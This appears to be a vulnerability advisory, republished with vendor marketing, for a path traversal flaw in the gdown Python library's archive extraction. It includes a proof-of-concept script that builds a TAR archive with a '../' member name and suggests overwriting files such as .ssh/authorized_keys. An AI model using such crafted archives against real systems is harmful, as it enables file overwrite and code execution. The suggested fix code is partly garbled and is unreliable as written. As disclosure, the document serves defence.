Summary
The gdown library (tested on v5.2.1) is vulnerable to a Path Traversal attack within its extractall functionality. When extracting a maliciously crafted ZIP or TAR archive, the library fails to sanitize or validate the filenames of the archive members. This allow files to be written outside the intended destination directory, potentially leading to arbitrary file overwrite and Remote Code Execution (RCE).
Details
The vulnerability exists in gdown/extractall.py within the extractall() function. The function takes an archive path and a destination directory (to), then calls the underlying extractall() method of Python's tarfile or zipfile modules without validating whether the archive members stay within the to boundary.
Vulnerable Code:
# gdown/extractall.py
def extractall(path, to=None):
# ... (omitted) ...
with opener(path, mode) as f:
f.extractall(path=to) # Vulnerable: No path validation or filters`
Even on modern Python versions (3.12+), if the filter parameter is not explicitly set or if the library's wrapper logic bypasses modern protections, path traversal remains possible as demonstrated in the PoC.
PoC
Steps to Reproduce
- Create the Malicious Archive (
poc.py):
import tarfile
import io
import os
# Create a target directory
os.makedirs("./safe_target/subfolder", exist_ok=True)
# Generate a TAR file containing a member with path traversal
with tarfile.open("evil.tar", "w") as tar:
# Target: escape the subfolder and write to the parent 'safe_target'
payload = tarfile.TarInfo(name="../escape.txt")
content = b"Path Traversal Success!"
payload.size = len(content)
tar.addfile(payload, io.BytesIO(content))
print("[+] evil.tar created.")`
- Execute the Vulnerable Function:
`python3 -c "from gdown import extractall; extractall('evil.tar', to='./safe_target/subfolder')"`
- Verify the Escape:
ls -l ./safe_target/escape.txt
# Output: -rw-r--r-- 1 user user 23 Mar 15 2026 ./safe_target/escape.txt`
Recommended Mitigation
mplement path validation to ensure that all extracted files are contained within the target directory.
Suggested Fix:
import os
def is_within_directory(directory, target):
abs_directory = os.path.abspath(directory)
abs_target = os.path.abspath(target)
prefix = os.path.commonpath([abs_directory])
return os.path.commonpath([abs_directory, abs_target]) == prefix
# Inside [extractall.py](http://extractall.py/)
with opener(path, mode) as f:
if isinstance(f, tarfile.TarFile):
for member in f.getmembers():
member_path = os.path.join(to, [member.name](http://member.name/))
if not is_within_directory(to, member_path):
raise Exception("Attempted Path Traversal in Tar File")
f.extractall(path=to)
Impact
An attacker can provide a specially crafted archive that, when extracted via gdown, overwrites critical files on the victim's system.
- Arbitrary File Overwrite: Overwriting
.bashrc,.ssh/authorized_keys, or configuration files. - Remote Code Execution (RCE): By overwriting executable scripts or Python modules within a virtual environment.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-40491 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.2.2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-40491? CVE-2026-40491 is a medium-severity path traversal vulnerability in gdown (pip), affecting versions <= 5.2.1. It is fixed in 5.2.2. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-40491? CVE-2026-40491 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of gdown are affected by CVE-2026-40491? gdown (pip) versions <= 5.2.1 is affected.
- Is there a fix for CVE-2026-40491? Yes. CVE-2026-40491 is fixed in 5.2.2. Upgrade to this version or later.
- Is CVE-2026-40491 exploitable, and should I be worried? Whether CVE-2026-40491 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40491 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40491? Upgrade
gdownto 5.2.2 or later.